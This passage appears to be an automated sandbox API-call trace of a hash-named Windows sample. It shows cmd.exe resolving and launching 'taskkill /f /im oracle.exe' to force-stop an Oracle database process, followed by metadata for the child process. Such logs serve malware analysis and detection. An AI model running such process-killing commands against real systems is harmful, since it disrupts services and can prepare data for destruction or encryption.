(HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x624140 [0153.452] GetProcessHeap () returned 0x620000 [0153.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4008) returned 0x62fcb0 [0153.452] GetProcessHeap () returned 0x620000 [0153.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4008) returned 0x633cc0 [0153.454] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0153.454] GetProcessHeap () returned 0x620000 [0153.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x418) returned 0x62a818 [0153.454] SetErrorMode (uMode=0x0) returned 0x8003 [0153.454] SetErrorMode (uMode=0x1) returned 0x0 [0153.455] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x62a820, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0153.455] SetErrorMode (uMode=0x8003) returned 0x1 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62a818, Size=0x7a) returned 0x62a818 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62a818) returned 0x7a [0153.455] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x62a8a0 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xb8) returned 0x62a910 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62a910, Size=0x62) returned 0x62a910 [0153.455] GetProcessHeap () returned 0x620000 [0153.455] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62a910) returned 0x62 [0153.456] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0153.456] GetProcessHeap () returned 0x620000 [0153.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe0) returned 0x62a980 [0153.460] GetProcessHeap () returned 0x620000 [0153.460] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62a980, Size=0x76) returned 0x62a980 [0153.460] GetProcessHeap () returned 0x620000 [0153.460] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62a980) returned 0x76 [0153.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.461] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im oracle.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0153.461] GetLastError () returned 0x3 [0153.461] GetProcessHeap () returned 0x620000 [0153.462] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62fcb0) returned 1 [0153.462] GetProcessHeap () returned 0x620000 [0153.462] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x633cc0) returned 1 [0153.462] GetProcessHeap () returned 0x620000 [0153.463] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bc98) returned 1 [0153.463] GetConsoleOutputCP () returned 0x1b5 [0153.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0153.466] GetUserDefaultLCID () returned 0x409 [0153.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0153.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0153.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0153.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0153.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0153.472] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0153.473] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0153.473] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.477] GetProcessHeap () returned 0x620000 [0153.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20c) returned 0x62aa48 [0153.477] GetConsoleTitleW (in: lpConsoleTitle=0x62aa48, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0153.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0153.481] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0153.481] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0153.481] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0153.482] GetProcessHeap () returned 0x620000 [0153.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400a) returned 0x62bc98 [0153.482] GetProcessHeap () returned 0x620000 [0153.483] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bc98) returned 1 [0153.484] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0153.484] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0153.484] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0153.484] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0153.484] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0153.484] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0153.484] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0153.484] GetProcessHeap () returned 0x620000 [0153.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x58) returned 0x62ac60 [0153.484] GetProcessHeap () returned 0x620000 [0153.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x62acc0 [0153.484] GetProcessHeap () returned 0x620000 [0153.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x62ace8 [0153.485] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0153.487] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0153.487] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0153.487] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0153.488] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0153.488] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0153.488] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0153.488] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0153.488] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0153.488] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0153.488] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0153.488] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0153.488] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0153.488] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0153.488] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0153.488] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0153.488] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0153.488] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0153.488] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0153.488] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0153.488] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0153.488] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0153.488] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0153.488] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0153.488] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0153.488] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0153.488] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0153.488] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0153.488] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0153.488] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0153.488] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0153.488] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0153.488] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0153.488] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0153.488] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0153.488] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0153.488] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0153.488] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0153.489] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0153.489] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0153.489] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0153.489] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0153.489] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0153.489] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0153.489] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0153.489] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0153.489] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0153.489] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0153.489] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0153.489] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0153.489] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0153.489] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0153.489] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0153.489] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0153.489] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0153.489] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0153.489] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0153.489] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0153.489] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0153.489] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0153.489] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0153.489] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0153.489] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0153.489] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0153.489] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0153.490] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0153.490] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0153.490] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0153.490] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0153.490] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0153.490] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0153.490] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0153.490] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0153.490] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0153.490] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0153.490] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0153.490] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0153.490] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0153.490] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0153.490] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0153.490] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0153.490] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0153.490] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0153.490] GetProcessHeap () returned 0x620000 [0153.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x210) returned 0x62ad20 [0153.490] GetProcessHeap () returned 0x620000 [0153.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x42) returned 0x62af38 [0153.491] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0153.491] GetProcessHeap () returned 0x620000 [0153.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x418) returned 0x6205c8 [0153.491] SetErrorMode (uMode=0x0) returned 0x8003 [0153.491] SetErrorMode (uMode=0x1) returned 0x0 [0153.491] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6205d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0153.491] SetErrorMode (uMode=0x8003) returned 0x1 [0153.491] GetProcessHeap () returned 0x620000 [0153.491] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6205c8, Size=0x56) returned 0x6205c8 [0153.491] GetProcessHeap () returned 0x620000 [0153.491] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6205c8) returned 0x56 [0153.491] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0153.491] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0153.491] GetProcessHeap () returned 0x620000 [0153.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x110) returned 0x62af88 [0153.491] GetProcessHeap () returned 0x620000 [0153.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x218) returned 0x620628 [0153.496] GetProcessHeap () returned 0x620000 [0153.496] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x620628, Size=0x112) returned 0x620628 [0153.496] GetProcessHeap () returned 0x620000 [0153.496] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x620628) returned 0x112 [0153.496] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0153.496] GetProcessHeap () returned 0x620000 [0153.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe0) returned 0x62b0a0 [0153.498] GetProcessHeap () returned 0x620000 [0153.498] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x62b0a0, Size=0x76) returned 0x62b0a0 [0153.498] GetProcessHeap () returned 0x620000 [0153.498] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x62b0a0) returned 0x76 [0153.498] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.498] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0153.499] GetLastError () returned 0x2 [0153.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x62b120 [0153.499] GetProcessHeap () returned 0x620000 [0153.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x6275c8 [0153.499] FindClose (in: hFindFile=0x62b120 | out: hFindFile=0x62b120) returned 1 [0153.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0153.499] GetLastError () returned 0x2 [0153.499] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x62b120 [0153.500] GetProcessHeap () returned 0x620000 [0153.500] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6275c8, Size=0x4) returned 0x624190 [0153.500] FindClose (in: hFindFile=0x62b120 | out: hFindFile=0x62b120) returned 1 [0153.500] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0153.500] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0153.500] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0153.501] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0153.501] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0153.501] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c)) [0153.501] GetProcessHeap () returned 0x620000 [0153.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x627708 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.502] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.503] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.503] GetProcessHeap () returned 0x620000 [0153.503] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x627708) returned 1 [0153.503] GetProcessHeap () returned 0x620000 [0153.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa) returned 0x62b120 [0153.503] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0153.506] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im oracle.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im oracle.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im oracle.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xc04, dwThreadId=0xdc8)) returned 1 [0153.529] CloseHandle (hObject=0x98) returned 1 [0153.529] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0153.529] GetProcessHeap () returned 0x620000 [0153.529] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x629d98) returned 1 [0153.530] GetEnvironmentStringsW () returned 0x629d98* [0153.530] GetProcessHeap () returned 0x620000 [0153.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa76) returned 0x62bc98 [0153.530] FreeEnvironmentStringsA (penv="=") returned 1 [0153.530] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0154.631] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0154.631] CloseHandle (hObject=0x9c) returned 1 [0154.632] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0154.632] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0154.632] GetProcessHeap () returned 0x620000 [0154.633] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bc98) returned 1 [0154.633] GetEnvironmentStringsW () returned 0x62b150* [0154.633] GetProcessHeap () returned 0x620000 [0154.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa9c) returned 0x62bbf8 [0154.633] FreeEnvironmentStringsA (penv="=") returned 1 [0154.633] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0154.633] GetProcessHeap () returned 0x620000 [0154.634] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62bbf8) returned 1 [0154.634] GetEnvironmentStringsW () returned 0x62b150* [0154.634] GetProcessHeap () returned 0x620000 [0154.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa9c) returned 0x62bbf8 [0154.634] FreeEnvironmentStringsA (penv="=") returned 1 [0154.634] GetProcessHeap () returned 0x620000 [0154.634] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62b120) returned 1 [0154.634] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0154.634] _get_osfhandle (_FileHandle=1) returned 0x130 [0154.634] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0154.634] _get_osfhandle (_FileHandle=1) returned 0x130 [0154.634] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0154.634] _get_osfhandle (_FileHandle=0) returned 0x158 [0154.634] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0154.634] GetConsoleOutputCP () returned 0x1b5 [0154.642] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0154.642] SetThreadUILanguage (LangId=0x0) returned 0x409 [0154.648] exit (_Code=128) Thread: id = 154 os_tid = 0xb0 Process: id = "19" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x55409000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x4b4" cmd_line = "taskkill /f /im oracle.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], 